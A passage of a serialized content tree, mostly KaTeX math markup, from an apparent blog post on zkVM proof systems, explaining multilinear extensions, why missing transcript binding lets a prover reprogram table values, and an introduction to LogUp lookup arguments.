111747],{"type":28,"tag":116,"props":111748,"children":111750},{"className":111749},[3700],[111751],{"type":28,"tag":116,"props":111752,"children":111754},{"className":111753},[3705],[111755],{"type":28,"tag":116,"props":111756,"children":111758},{"className":111757,"style":108377},[3710],[111759],{"type":28,"tag":116,"props":111760,"children":111761},{"style":3714},[111762,111766],{"type":28,"tag":116,"props":111763,"children":111765},{"className":111764,"style":3720},[3719],[],{"type":28,"tag":116,"props":111767,"children":111769},{"className":111768},[3725,3726,3727,3728],[111770],{"type":28,"tag":116,"props":111771,"children":111773},{"className":111772},[3680,21251,3728],[111774],{"type":33,"value":56022},{"type":33,"value":111776},": it matches the table on Boolean points and extends it to field points.",{"type":28,"tag":29,"props":111778,"children":111779},{},[111780],{"type":33,"value":111781},"For this post, the only property you need is:",{"type":28,"tag":29,"props":111783,"children":111784},{},[111785],{"type":28,"tag":98,"props":111786,"children":111788},{"className":111787},[3652,3653],[111789],{"type":28,"tag":116,"props":111790,"children":111792},{"className":111791},[3658],[111793],{"type":28,"tag":116,"props":111794,"children":111796},{"className":111795,"ariaHidden":3664},[3663],[111797,111959,112231],{"type":28,"tag":116,"props":111798,"children":111800},{"className":111799},[3669],[111801,111806,111875,111880,111941,111946,111950,111955],{"type":28,"tag":116,"props":111802,"children":111805},{"className":111803,"style":111804},[3674],"height:1.1813em;vertical-align:-0.25em;",[],{"type":28,"tag":116,"props":111807,"children":111810},{"className":111808},[3680,111809],"accent",[111811],{"type":28,"tag":116,"props":111812,"children":111814},{"className":111813},[3700,21305],[111815,111863],{"type":28,"tag":116,"props":111816,"children":111818},{"className":111817},[3705],[111819,111858],{"type":28,"tag":116,"props":111820,"children":111823},{"className":111821,"style":111822},[3710],"height:0.9313em;",[111824,111838],{"type":28,"tag":116,"props":111825,"children":111827},{"style":111826},"top:-3em;",[111828,111833],{"type":28,"tag":116,"props":111829,"children":111832},{"className":111830,"style":111831},[3719],"height:3em;",[],{"type":28,"tag":116,"props":111834,"children":111836},{"className":111835,"style":95017},[3680,21251],[111837],{"type":33,"value":32719},{"type":28,"tag":116,"props":111839,"children":111841},{"style":111840},"top:-3.6134em;",[111842,111846],{"type":28,"tag":116,"props":111843,"children":111845},{"className":111844,"style":111831},[3719],[],{"type":28,"tag":116,"props":111847,"children":111851},{"className":111848,"style":111850},[111849],"accent-body","left:-0.0833em;",[111852],{"type":28,"tag":116,"props":111853,"children":111855},{"className":111854},[3680],[111856],{"type":33,"value":111857},"~",{"type":28,"tag":116,"props":111859,"children":111861},{"className":111860},[21407],[111862],{"type":33,"value":21410},{"type":28,"tag":116,"props":111864,"children":111866},{"className":111865},[3705],[111867],{"type":28,"tag":116,"props":111868,"children":111871},{"className":111869,"style":111870},[3710],"height:0.1944em;",[111872],{"type":28,"tag":116,"props":111873,"children":111874},{},[],{"type":28,"tag":116,"props":111876,"children":111878},{"className":111877},[21380],[111879],{"type":33,"value":313},{"type":28,"tag":116,"props":111881,"children":111883},{"className":111882},[3680,111809],[111884],{"type":28,"tag":116,"props":111885,"children":111887},{"className":111886},[3700],[111888],{"type":28,"tag":116,"props":111889,"children":111891},{"className":111890},[3705],[111892],{"type":28,"tag":116,"props":111893,"children":111896},{"className":111894,"style":111895},[3710],"height:0.714em;",[111897,111909],{"type":28,"tag":116,"props":111898,"children":111899},{"style":111826},[111900,111904],{"type":28,"tag":116,"props":111901,"children":111903},{"className":111902,"style":111831},[3719],[],{"type":28,"tag":116,"props":111905,"children":111907},{"className":111906,"style":92663},[3680,21251],[111908],{"type":33,"value":93482},{"type":28,"tag":116,"props":111910,"children":111911},{"style":111826},[111912,111916],{"type":28,"tag":116,"props":111913,"children":111915},{"className":111914,"style":111831},[3719],[],{"type":28,"tag":116,"props":111917,"children":111920},{"className":111918,"style":111919},[111849],"left:-0.1799em;",[111921],{"type":28,"tag":116,"props":111922,"children":111926},{"className":111923,"style":111925},[111924],"overlay","height:0.714em;width:0.471em;",[111927],{"type":28,"tag":33904,"props":111928,"children":111935},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},"http://www.w3.org/2000/svg","0.471em","0.714em","width:0.471em","0 0 471 714","xMinYMin",[111936],{"type":28,"tag":111937,"props":111938,"children":111940},"path",{"d":111939},"M377 20c0-5.333 1.833-10 5.5-14S391 0 397 0c4.667 0 8.667 1.667 12 5\n3.333 2.667 6.667 9 10 19 6.667 24.667 20.333 43.667 41 57 7.333 4.667 11\n10.667 11 18 0 6-1 10-3 12s-6.667 5-14 9c-28.667 14.667-53.667 35.667-75 63\n-1.333 1.333-3.167 3.5-5.5 6.5s-4 4.833-5 5.5c-1 .667-2.5 1.333-4.5 2s-4.333 1\n-7 1c-4.667 0-9.167-1.833-13.5-5.5S337 184 337 178c0-12.667 15.667-32.333 47-59\nH213l-171-1c-8.667-6-13-12.333-13-19 0-4.667 4.333-11.333 13-20h359\nc-16-25.333-24-45-24-59z",[],{"type":28,"tag":116,"props":111942,"children":111944},{"className":111943},[21401],[111945],{"type":33,"value":1829},{"type":28,"tag":116,"props":111947,"children":111949},{"className":111948,"style":3857},[3759],[],{"type":28,"tag":116,"props":111951,"children":111953},{"className":111952},[3862],[111954],{"type":33,"value":373},{"type":28,"tag":116,"props":111956,"children":111958},{"className":111957,"style":3857},[3759],[],{"type":28,"tag":116,"props":111960,"children":111962},{"className":111961},[3669],[111963,111968,112149,112153,112158,112163,112213,112218,112222,112227],{"type":28,"tag":116,"props":111964,"children":111967},{"className":111965,"style":111966},[3674],"height:1.4918em;vertical-align:-0.5144em;",[],{"type":28,"tag":116,"props":111969,"children":111971},{"className":111970},[21287],[111972,111977],{"type":28,"tag":116,"props":111973,"children":111975},{"className":111974,"style":21294},[21287,21292,21293],[111976],{"type":33,"value":108455},{"type":28,"tag":116,"props":111978,"children":111980},{"className":111979},[3695],[111981],{"type":28,"tag":116,"props":111982,"children":111984},{"className":111983},[3700,21305],[111985,112137],{"type":28,"tag":116,"props":111986,"children":111988},{"className":111987},[3705],[111989,112132],{"type":28,"tag":116,"props":111990,"children":111993},{"className":111991,"style":111992},[3710],"height:0.3448em;",[111994],{"type":28,"tag":116,"props":111995,"children":111997},{"style":111996},"top:-2.3606em;margin-left:0em;margin-right:0.05em;",[111998,112002],{"type":28,"tag":116,"props":111999,"children":112001},{"className":112000,"style":3720},[3719],[],{"type":28,"tag":116,"props":112003,"children":112005},{"className":112004},[3725,3726,3727,3728],[112006],{"type":28,"tag":116,"props":112007,"children":112009},{"className":112008},[3680,3728],[112010,112064,112069,112074,112079,112084,112089],{"type":28,"tag":116,"props":112011,"children":112013},{"className":112012},[3680,111809,3728],[112014],{"type":28,"tag":116,"props":112015,"children":112017},{"className":112016},[3700],[112018],{"type":28,"tag":116,"props":112019,"children":112021},{"className":112020},[3705],[112022],{"type":28,"tag":116,"props":112023,"children":112026},{"className":112024,"style":112025},[3710],"height:0.9774em;",[112027,112041],{"type":28,"tag":116,"props":112028,"children":112030},{"style":112029},"top:-2.714em;",[112031,112036],{"type":28,"tag":116,"props":112032,"children":112035},{"className":112033,"style":112034},[3719],"height:2.714em;",[],{"type":28,"tag":116,"props":112037,"children":112039},{"className":112038},[3680,21251,3728],[112040],{"type":33,"value":2893},{"type":28,"tag":116,"props":112042,"children":112044},{"style":112043},"top:-2.9774em;",[112045,112049],{"type":28,"tag":116,"props":112046,"children":112048},{"className":112047,"style":112034},[3719],[],{"type":28,"tag":116,"props":112050,"children":112053},{"className":112051,"style":112052},[111849],"left:-0.2355em;",[112054],{"type":28,"tag":116,"props":112055,"children":112057},{"className":112056,"style":111925},[111924,3728],[112058],{"type":28,"tag":33904,"props":112059,"children":112060},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112061],{"type":28,"tag":111937,"props":112062,"children":112063},{"d":111939},[],{"type":28,"tag":116,"props":112065,"children":112067},{"className":112066},[3862,3728],[112068],{"type":33,"value":21358},{"type":28,"tag":116,"props":112070,"children":112072},{"className":112071},[21380,3728],[112073],{"type":33,"value":76238},{"type":28,"tag":116,"props":112075,"children":112077},{"className":112076},[3680,3728],[112078],{"type":33,"value":353},{"type":28,"tag":116,"props":112080,"children":112082},{"className":112081},[3791,3728],[112083],{"type":33,"value":3794},{"type":28,"tag":116,"props":112085,"children":112087},{"className":112086},[3680,3728],[112088],{"type":33,"value":1824},{"type":28,"tag":116,"props":112090,"children":112092},{"className":112091},[21401,3728],[112093,112098],{"type":28,"tag":116,"props":112094,"children":112096},{"className":112095},[21401,3728],[112097],{"type":33,"value":885},{"type":28,"tag":116,"props":112099,"children":112101},{"className":112100},[3695],[112102],{"type":28,"tag":116,"props":112103,"children":112105},{"className":112104},[3700],[112106],{"type":28,"tag":116,"props":112107,"children":112109},{"className":112108},[3705],[112110],{"type":28,"tag":116,"props":112111,"children":112114},{"className":112112,"style":112113},[3710],"height:0.5935em;",[112115],{"type":28,"tag":116,"props":112116,"children":112118},{"style":112117},"top:-2.786em;margin-right:0.0714em;",[112119,112123],{"type":28,"tag":116,"props":112120,"children":112122},{"className":112121,"style":108520},[3719],[],{"type":28,"tag":116,"props":112124,"children":112126},{"className":112125},[3725,108525,108526,3728],[112127],{"type":28,"tag":116,"props":112128,"children":112130},{"className":112129},[3680,21251,3728],[112131],{"type":33,"value":56022},{"type":28,"tag":116,"props":112133,"children":112135},{"className":112134},[21407],[112136],{"type":33,"value":21410},{"type":28,"tag":116,"props":112138,"children":112140},{"className":112139},[3705],[112141],{"type":28,"tag":116,"props":112142,"children":112145},{"className":112143,"style":112144},[3710],"height:0.5144em;",[112146],{"type":28,"tag":116,"props":112147,"children":112148},{},[],{"type":28,"tag":116,"props":112150,"children":112152},{"className":112151,"style":3798},[3759],[],{"type":28,"tag":116,"props":112154,"children":112156},{"className":112155,"style":95017},[3680,21251],[112157],{"type":33,"value":32719},{"type":28,"tag":116,"props":112159,"children":112161},{"className":112160},[21380],[112162],{"type":33,"value":313},{"type":28,"tag":116,"props":112164,"children":112166},{"className":112165},[3680,111809],[112167],{"type":28,"tag":116,"props":112168,"children":112170},{"className":112169},[3700],[112171],{"type":28,"tag":116,"props":112172,"children":112174},{"className":112173},[3705],[112175],{"type":28,"tag":116,"props":112176,"children":112178},{"className":112177,"style":112025},[3710],[112179,112191],{"type":28,"tag":116,"props":112180,"children":112181},{"style":111826},[112182,112186],{"type":28,"tag":116,"props":112183,"children":112185},{"className":112184,"style":111831},[3719],[],{"type":28,"tag":116,"props":112187,"children":112189},{"className":112188},[3680,21251],[112190],{"type":33,"value":2893},{"type":28,"tag":116,"props":112192,"children":112194},{"style":112193},"top:-3.2634em;",[112195,112199],{"type":28,"tag":116,"props":112196,"children":112198},{"className":112197,"style":111831},[3719],[],{"type":28,"tag":116,"props":112200,"children":112202},{"className":112201,"style":112052},[111849],[112203],{"type":28,"tag":116,"props":112204,"children":112206},{"className":112205,"style":111925},[111924],[112207],{"type":28,"tag":33904,"props":112208,"children":112209},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112210],{"type":28,"tag":111937,"props":112211,"children":112212},{"d":111939},[],{"type":28,"tag":116,"props":112214,"children":112216},{"className":112215},[21401],[112217],{"type":33,"value":1829},{"type":28,"tag":116,"props":112219,"children":112221},{"className":112220,"style":3760},[3759],[],{"type":28,"tag":116,"props":112223,"children":112225},{"className":112224},[3765],[112226],{"type":33,"value":110922},{"type":28,"tag":116,"props":112228,"children":112230},{"className":112229,"style":3760},[3759],[],{"type":28,"tag":116,"props":112232,"children":112234},{"className":112233},[3669],[112235,112240,112250,112255,112304,112309,112313,112362],{"type":28,"tag":116,"props":112236,"children":112239},{"className":112237,"style":112238},[3674],"height:1.2274em;vertical-align:-0.25em;",[],{"type":28,"tag":116,"props":112241,"children":112243},{"className":112242},[3680,33],[112244],{"type":28,"tag":116,"props":112245,"children":112247},{"className":112246},[3680],[112248],{"type":33,"value":112249},"eq",{"type":28,"tag":116,"props":112251,"children":112253},{"className":112252},[21380],[112254],{"type":33,"value":313},{"type":28,"tag":116,"props":112256,"children":112258},{"className":112257},[3680,111809],[112259],{"type":28,"tag":116,"props":112260,"children":112262},{"className":112261},[3700],[112263],{"type":28,"tag":116,"props":112264,"children":112266},{"className":112265},[3705],[112267],{"type":28,"tag":116,"props":112268,"children":112270},{"className":112269,"style":112025},[3710],[112271,112283],{"type":28,"tag":116,"props":112272,"children":112273},{"style":111826},[112274,112278],{"type":28,"tag":116,"props":112275,"children":112277},{"className":112276,"style":111831},[3719],[],{"type":28,"tag":116,"props":112279,"children":112281},{"className":112280},[3680,21251],[112282],{"type":33,"value":2893},{"type":28,"tag":116,"props":112284,"children":112285},{"style":112193},[112286,112290],{"type":28,"tag":116,"props":112287,"children":112289},{"className":112288,"style":111831},[3719],[],{"type":28,"tag":116,"props":112291,"children":112293},{"className":112292,"style":112052},[111849],[112294],{"type":28,"tag":116,"props":112295,"children":112297},{"className":112296,"style":111925},[111924],[112298],{"type":28,"tag":33904,"props":112299,"children":112300},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112301],{"type":28,"tag":111937,"props":112302,"children":112303},{"d":111939},[],{"type":28,"tag":116,"props":112305,"children":112307},{"className":112306},[3791],[112308],{"type":33,"value":3794},{"type":28,"tag":116,"props":112310,"children":112312},{"className":112311,"style":3798},[3759],[],{"type":28,"tag":116,"props":112314,"children":112316},{"className":112315},[3680,111809],[112317],{"type":28,"tag":116,"props":112318,"children":112320},{"className":112319},[3700],[112321],{"type":28,"tag":116,"props":112322,"children":112324},{"className":112323},[3705],[112325],{"type":28,"tag":116,"props":112326,"children":112328},{"className":112327,"style":111895},[3710],[112329,112341],{"type":28,"tag":116,"props":112330,"children":112331},{"style":111826},[112332,112336],{"type":28,"tag":116,"props":112333,"children":112335},{"className":112334,"style":111831},[3719],[],{"type":28,"tag":116,"props":112337,"children":112339},{"className":112338,"style":92663},[3680,21251],[112340],{"type":33,"value":93482},{"type":28,"tag":116,"props":112342,"children":112343},{"style":111826},[112344,112348],{"type":28,"tag":116,"props":112345,"children":112347},{"className":112346,"style":111831},[3719],[],{"type":28,"tag":116,"props":112349,"children":112351},{"className":112350,"style":111919},[111849],[112352],{"type":28,"tag":116,"props":112353,"children":112355},{"className":112354,"style":111925},[111924],[112356],{"type":28,"tag":33904,"props":112357,"children":112358},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112359],{"type":28,"tag":111937,"props":112360,"children":112361},{"d":111939},[],{"type":28,"tag":116,"props":112363,"children":112365},{"className":112364},[21401],[112366],{"type":33,"value":1829},{"type":28,"tag":29,"props":112368,"children":112369},{},[112370,112372,112441,112443,112589,112591,112730,112732,112816],{"type":33,"value":112371},"At a fixed challenge point ",{"type":28,"tag":98,"props":112373,"children":112375},{"className":112374},[3652,3653],[112376],{"type":28,"tag":116,"props":112377,"children":112379},{"className":112378},[3658],[112380],{"type":28,"tag":116,"props":112381,"children":112383},{"className":112382,"ariaHidden":3664},[3663],[112384],{"type":28,"tag":116,"props":112385,"children":112387},{"className":112386},[3669],[112388,112392],{"type":28,"tag":116,"props":112389,"children":112391},{"className":112390,"style":111895},[3674],[],{"type":28,"tag":116,"props":112393,"children":112395},{"className":112394},[3680,111809],[112396],{"type":28,"tag":116,"props":112397,"children":112399},{"className":112398},[3700],[112400],{"type":28,"tag":116,"props":112401,"children":112403},{"className":112402},[3705],[112404],{"type":28,"tag":116,"props":112405,"children":112407},{"className":112406,"style":111895},[3710],[112408,112420],{"type":28,"tag":116,"props":112409,"children":112410},{"style":111826},[112411,112415],{"type":28,"tag":116,"props":112412,"children":112414},{"className":112413,"style":111831},[3719],[],{"type":28,"tag":116,"props":112416,"children":112418},{"className":112417,"style":92663},[3680,21251],[112419],{"type":33,"value":93482},{"type":28,"tag":116,"props":112421,"children":112422},{"style":111826},[112423,112427],{"type":28,"tag":116,"props":112424,"children":112426},{"className":112425,"style":111831},[3719],[],{"type":28,"tag":116,"props":112428,"children":112430},{"className":112429,"style":111919},[111849],[112431],{"type":28,"tag":116,"props":112432,"children":112434},{"className":112433,"style":111925},[111924],[112435],{"type":28,"tag":33904,"props":112436,"children":112437},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112438],{"type":28,"tag":111937,"props":112439,"children":112440},{"d":111939},[],{"type":33,"value":112442},", the coefficients ",{"type":28,"tag":98,"props":112444,"children":112446},{"className":112445},[3652,3653],[112447],{"type":28,"tag":116,"props":112448,"children":112450},{"className":112449},[3658],[112451],{"type":28,"tag":116,"props":112452,"children":112454},{"className":112453,"ariaHidden":3664},[3663],[112455],{"type":28,"tag":116,"props":112456,"children":112458},{"className":112457},[3669],[112459,112463,112472,112477,112526,112531,112535,112584],{"type":28,"tag":116,"props":112460,"children":112462},{"className":112461,"style":112238},[3674],[],{"type":28,"tag":116,"props":112464,"children":112466},{"className":112465},[3680,33],[112467],{"type":28,"tag":116,"props":112468,"children":112470},{"className":112469},[3680],[112471],{"type":33,"value":112249},{"type":28,"tag":116,"props":112473,"children":112475},{"className":112474},[21380],[112476],{"type":33,"value":313},{"type":28,"tag":116,"props":112478,"children":112480},{"className":112479},[3680,111809],[112481],{"type":28,"tag":116,"props":112482,"children":112484},{"className":112483},[3700],[112485],{"type":28,"tag":116,"props":112486,"children":112488},{"className":112487},[3705],[112489],{"type":28,"tag":116,"props":112490,"children":112492},{"className":112491,"style":112025},[3710],[112493,112505],{"type":28,"tag":116,"props":112494,"children":112495},{"style":111826},[112496,112500],{"type":28,"tag":116,"props":112497,"children":112499},{"className":112498,"style":111831},[3719],[],{"type":28,"tag":116,"props":112501,"children":112503},{"className":112502},[3680,21251],[112504],{"type":33,"value":2893},{"type":28,"tag":116,"props":112506,"children":112507},{"style":112193},[112508,112512],{"type":28,"tag":116,"props":112509,"children":112511},{"className":112510,"style":111831},[3719],[],{"type":28,"tag":116,"props":112513,"children":112515},{"className":112514,"style":112052},[111849],[112516],{"type":28,"tag":116,"props":112517,"children":112519},{"className":112518,"style":111925},[111924],[112520],{"type":28,"tag":33904,"props":112521,"children":112522},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112523],{"type":28,"tag":111937,"props":112524,"children":112525},{"d":111939},[],{"type":28,"tag":116,"props":112527,"children":112529},{"className":112528},[3791],[112530],{"type":33,"value":3794},{"type":28,"tag":116,"props":112532,"children":112534},{"className":112533,"style":3798},[3759],[],{"type":28,"tag":116,"props":112536,"children":112538},{"className":112537},[3680,111809],[112539],{"type":28,"tag":116,"props":112540,"children":112542},{"className":112541},[3700],[112543],{"type":28,"tag":116,"props":112544,"children":112546},{"className":112545},[3705],[112547],{"type":28,"tag":116,"props":112548,"children":112550},{"className":112549,"style":111895},[3710],[112551,112563],{"type":28,"tag":116,"props":112552,"children":112553},{"style":111826},[112554,112558],{"type":28,"tag":116,"props":112555,"children":112557},{"className":112556,"style":111831},[3719],[],{"type":28,"tag":116,"props":112559,"children":112561},{"className":112560,"style":92663},[3680,21251],[112562],{"type":33,"value":93482},{"type":28,"tag":116,"props":112564,"children":112565},{"style":111826},[112566,112570],{"type":28,"tag":116,"props":112567,"children":112569},{"className":112568,"style":111831},[3719],[],{"type":28,"tag":116,"props":112571,"children":112573},{"className":112572,"style":111919},[111849],[112574],{"type":28,"tag":116,"props":112575,"children":112577},{"className":112576,"style":111925},[111924],[112578],{"type":28,"tag":33904,"props":112579,"children":112580},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112581],{"type":28,"tag":111937,"props":112582,"children":112583},{"d":111939},[],{"type":28,"tag":116,"props":112585,"children":112587},{"className":112586},[21401],[112588],{"type":33,"value":1829},{"type":33,"value":112590}," are constants, so ",{"type":28,"tag":98,"props":112592,"children":112594},{"className":112593},[3652,3653],[112595],{"type":28,"tag":116,"props":112596,"children":112598},{"className":112597},[3658],[112599],{"type":28,"tag":116,"props":112600,"children":112602},{"className":112601,"ariaHidden":3664},[3663],[112603],{"type":28,"tag":116,"props":112604,"children":112606},{"className":112605},[3669],[112607,112611,112671,112676,112725],{"type":28,"tag":116,"props":112608,"children":112610},{"className":112609,"style":111804},[3674],[],{"type":28,"tag":116,"props":112612,"children":112614},{"className":112613},[3680,111809],[112615],{"type":28,"tag":116,"props":112616,"children":112618},{"className":112617},[3700,21305],[112619,112660],{"type":28,"tag":116,"props":112620,"children":112622},{"className":112621},[3705],[112623,112655],{"type":28,"tag":116,"props":112624,"children":112626},{"className":112625,"style":111822},[3710],[112627,112639],{"type":28,"tag":116,"props":112628,"children":112629},{"style":111826},[112630,112634],{"type":28,"tag":116,"props":112631,"children":112633},{"className":112632,"style":111831},[3719],[],{"type":28,"tag":116,"props":112635,"children":112637},{"className":112636,"style":95017},[3680,21251],[112638],{"type":33,"value":32719},{"type":28,"tag":116,"props":112640,"children":112641},{"style":111840},[112642,112646],{"type":28,"tag":116,"props":112643,"children":112645},{"className":112644,"style":111831},[3719],[],{"type":28,"tag":116,"props":112647,"children":112649},{"className":112648,"style":111850},[111849],[112650],{"type":28,"tag":116,"props":112651,"children":112653},{"className":112652},[3680],[112654],{"type":33,"value":111857},{"type":28,"tag":116,"props":112656,"children":112658},{"className":112657},[21407],[112659],{"type":33,"value":21410},{"type":28,"tag":116,"props":112661,"children":112663},{"className":112662},[3705],[112664],{"type":28,"tag":116,"props":112665,"children":112667},{"className":112666,"style":111870},[3710],[112668],{"type":28,"tag":116,"props":112669,"children":112670},{},[],{"type":28,"tag":116,"props":112672,"children":112674},{"className":112673},[21380],[112675],{"type":33,"value":313},{"type":28,"tag":116,"props":112677,"children":112679},{"className":112678},[3680,111809],[112680],{"type":28,"tag":116,"props":112681,"children":112683},{"className":112682},[3700],[112684],{"type":28,"tag":116,"props":112685,"children":112687},{"className":112686},[3705],[112688],{"type":28,"tag":116,"props":112689,"children":112691},{"className":112690,"style":111895},[3710],[112692,112704],{"type":28,"tag":116,"props":112693,"children":112694},{"style":111826},[112695,112699],{"type":28,"tag":116,"props":112696,"children":112698},{"className":112697,"style":111831},[3719],[],{"type":28,"tag":116,"props":112700,"children":112702},{"className":112701,"style":92663},[3680,21251],[112703],{"type":33,"value":93482},{"type":28,"tag":116,"props":112705,"children":112706},{"style":111826},[112707,112711],{"type":28,"tag":116,"props":112708,"children":112710},{"className":112709,"style":111831},[3719],[],{"type":28,"tag":116,"props":112712,"children":112714},{"className":112713,"style":111919},[111849],[112715],{"type":28,"tag":116,"props":112716,"children":112718},{"className":112717,"style":111925},[111924],[112719],{"type":28,"tag":33904,"props":112720,"children":112721},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112722],{"type":28,"tag":111937,"props":112723,"children":112724},{"d":111939},[],{"type":28,"tag":116,"props":112726,"children":112728},{"className":112727},[21401],[112729],{"type":33,"value":1829},{"type":33,"value":112731}," is linear in the table values ",{"type":28,"tag":98,"props":112733,"children":112735},{"className":112734},[3652,3653],[112736],{"type":28,"tag":116,"props":112737,"children":112739},{"className":112738},[3658],[112740],{"type":28,"tag":116,"props":112741,"children":112743},{"className":112742,"ariaHidden":3664},[3663],[112744],{"type":28,"tag":116,"props":112745,"children":112747},{"className":112746},[3669],[112748,112752,112757,112762,112811],{"type":28,"tag":116,"props":112749,"children":112751},{"className":112750,"style":112238},[3674],[],{"type":28,"tag":116,"props":112753,"children":112755},{"className":112754,"style":95017},[3680,21251],[112756],{"type":33,"value":32719},{"type":28,"tag":116,"props":112758,"children":112760},{"className":112759},[21380],[112761],{"type":33,"value":313},{"type":28,"tag":116,"props":112763,"children":112765},{"className":112764},[3680,111809],[112766],{"type":28,"tag":116,"props":112767,"children":112769},{"className":112768},[3700],[112770],{"type":28,"tag":116,"props":112771,"children":112773},{"className":112772},[3705],[112774],{"type":28,"tag":116,"props":112775,"children":112777},{"className":112776,"style":112025},[3710],[112778,112790],{"type":28,"tag":116,"props":112779,"children":112780},{"style":111826},[112781,112785],{"type":28,"tag":116,"props":112782,"children":112784},{"className":112783,"style":111831},[3719],[],{"type":28,"tag":116,"props":112786,"children":112788},{"className":112787},[3680,21251],[112789],{"type":33,"value":2893},{"type":28,"tag":116,"props":112791,"children":112792},{"style":112193},[112793,112797],{"type":28,"tag":116,"props":112794,"children":112796},{"className":112795,"style":111831},[3719],[],{"type":28,"tag":116,"props":112798,"children":112800},{"className":112799,"style":112052},[111849],[112801],{"type":28,"tag":116,"props":112802,"children":112804},{"className":112803,"style":111925},[111924],[112805],{"type":28,"tag":33904,"props":112806,"children":112807},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112808],{"type":28,"tag":111937,"props":112809,"children":112810},{"d":111939},[],{"type":28,"tag":116,"props":112812,"children":112814},{"className":112813},[21401],[112815],{"type":33,"value":1829},{"type":33,"value":141},{"type":28,"tag":29,"props":112818,"children":112819},{},[112820,112822,112891],{"type":33,"value":112821},"That linearity is exactly why missing transcript binding is dangerous: if ",{"type":28,"tag":98,"props":112823,"children":112825},{"className":112824},[3652,3653],[112826],{"type":28,"tag":116,"props":112827,"children":112829},{"className":112828},[3658],[112830],{"type":28,"tag":116,"props":112831,"children":112833},{"className":112832,"ariaHidden":3664},[3663],[112834],{"type":28,"tag":116,"props":112835,"children":112837},{"className":112836},[3669],[112838,112842],{"type":28,"tag":116,"props":112839,"children":112841},{"className":112840,"style":111895},[3674],[],{"type":28,"tag":116,"props":112843,"children":112845},{"className":112844},[3680,111809],[112846],{"type":28,"tag":116,"props":112847,"children":112849},{"className":112848},[3700],[112850],{"type":28,"tag":116,"props":112851,"children":112853},{"className":112852},[3705],[112854],{"type":28,"tag":116,"props":112855,"children":112857},{"className":112856,"style":111895},[3710],[112858,112870],{"type":28,"tag":116,"props":112859,"children":112860},{"style":111826},[112861,112865],{"type":28,"tag":116,"props":112862,"children":112864},{"className":112863,"style":111831},[3719],[],{"type":28,"tag":116,"props":112866,"children":112868},{"className":112867,"style":92663},[3680,21251],[112869],{"type":33,"value":93482},{"type":28,"tag":116,"props":112871,"children":112872},{"style":111826},[112873,112877],{"type":28,"tag":116,"props":112874,"children":112876},{"className":112875,"style":111831},[3719],[],{"type":28,"tag":116,"props":112878,"children":112880},{"className":112879,"style":111919},[111849],[112881],{"type":28,"tag":116,"props":112882,"children":112884},{"className":112883,"style":111925},[111924],[112885],{"type":28,"tag":33904,"props":112886,"children":112887},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[112888],{"type":28,"tag":111937,"props":112889,"children":112890},{"d":111939},[],{"type":33,"value":112892}," is sampled before those values are bound, an attacker can reprogram values while preserving the same evaluated claim.",{"type":28,"tag":75,"props":112894,"children":112896},{"id":112895},"lookup-arguments-logup",[112897],{"type":33,"value":112898},"Lookup Arguments (LogUp)",{"type":28,"tag":29,"props":112900,"children":112901},{},[112902],{"type":33,"value":112903},"zkVMs need to check that values satisfy certain properties. For example:",{"type":28,"tag":2108,"props":112905,"children":112906},{},[112907,112963,112968],{"type":28,"tag":459,"props":112908,"children":112909},{},[112910,112912,112962],{"type":33,"value":112911},"Is this byte in range ",{"type":28,"tag":98,"props":112913,"children":112915},{"className":112914},[3652,3653],[112916],{"type":28,"tag":116,"props":112917,"children":112919},{"className":112918},[3658],[112920],{"type":28,"tag":116,"props":112921,"children":112923},{"className":112922,"ariaHidden":3664},[3663],[112924],{"type":28,"tag":116,"props":112925,"children":112927},{"className":112926},[3669],[112928,112932,112937,112942,112947,112951,112957],{"type":28,"tag":116,"props":112929,"children":112931},{"className":112930,"style":3780},[3674],[],{"type":28,"tag":116,"props":112933,"children":112935},{"className":112934},[21380],[112936],{"type":33,"value":347},{"type":28,"tag":116,"props":112938,"children":112940},{"className":112939},[3680],[112941],{"type":33,"value":353},{"type":28,"tag":116,"props":112943,"children":112945},{"className":112944},[3791],[112946],{"type":33,"value":3794},{"type":28,"tag":116,"props":112948,"children":112950},{"className":112949,"style":3798},[3759],[],{"type":28,"tag":116,"props":112952,"children":112954},{"className":112953},[3680],[112955],{"type":33,"value":112956},"255",{"type":28,"tag":116,"props":112958,"children":112960},{"className":112959},[21401],[112961],{"type":33,"value":15074},{"type":33,"value":2825},{"type":28,"tag":459,"props":112964,"children":112965},{},[112966],{"type":33,"value":112967},"Does this opcode decode correctly?",{"type":28,"tag":459,"props":112969,"children":112970},{},[112971],{"type":33,"value":112972},"Is this memory access consistent with previous accesses?",{"type":28,"tag":29,"props":112974,"children":112975},{},[112976,112981],{"type":28,"tag":4995,"props":112977,"children":112978},{},[112979],{"type":33,"value":112980},"The naive approach:",{"type":33,"value":112982}," Add constraints for each check. Expensive.",{"type":28,"tag":29,"props":112984,"children":112985},{},[112986,112991,112993,112998],{"type":28,"tag":4995,"props":112987,"children":112988},{},[112989],{"type":33,"value":112990},"The clever approach:",{"type":33,"value":112992}," Precompute a table of valid tuples. Prove that every value the program uses appears in the table. This is a ",{"type":28,"tag":4995,"props":112994,"children":112995},{},[112996],{"type":33,"value":112997},"multiset membership",{"type":33,"value":67416},{"type":28,"tag":29,"props":113000,"children":113001},{},[113002,113007],{"type":28,"tag":4995,"props":113003,"children":113004},{},[113005],{"type":33,"value":113006},"LogUp (Logarithmic Derivative):",{"type":33,"value":113008}," Encode multiset membership as a sum of fractions.",{"type":28,"tag":29,"props":113010,"children":113011},{},[113012,113014,113039,113041,113068],{"type":33,"value":113013},"If set 